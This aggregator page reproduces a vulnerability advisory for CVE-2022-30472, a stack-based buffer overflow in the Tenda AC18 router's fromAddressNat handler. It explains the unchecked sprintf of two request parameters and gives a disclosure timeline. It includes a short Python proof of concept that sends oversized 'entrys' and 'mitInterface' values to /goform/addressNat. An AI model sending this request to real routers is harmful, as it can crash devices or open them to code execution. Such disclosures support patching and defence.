Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-30472: VulnRepo/IoT/Tenda/1 at master · lcyfrank/VulnRepo

Tenda AC Seris Router AC18_V15.03.05.19(6318) has a stack-based buffer overflow vulnerability in function fromAddressNat

CVE
Open in Source
#vulnerability#rce#buffer_overflow

Tenda Router AC18 Vulnerability

This vulnerability lies in the /goform/addressNat page which influences the lastest version of Tenda Router AC18. (The latest version is AC18_V15.03.05.19(6318))

Vulnerability Description

There is a stack-based buffer overflow vulnerability in function fromAddressNat.

In function fromAddressNat it reads 2 user provided parameters entrys and mitInterface into v9 and v8, and these two variables are passed into function sprintf without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/addressNat, the attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

PoC

import requests

IP = “10.10.10.1” url = f"http://{IP}/goform/addressNat?" url += “entrys=” + “s” * 0x200 url += “&mitInterface=” + “a” * 0x200

response = requests.get(url)

Timeline

  • 2022-05-05: Report to CVE & CNVD;
  • 2022-05-26: CVE ID assigned (CVE-2022-30472)

Acknowledge

Credit to @peanuts and @cylin from IIE, CAS.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE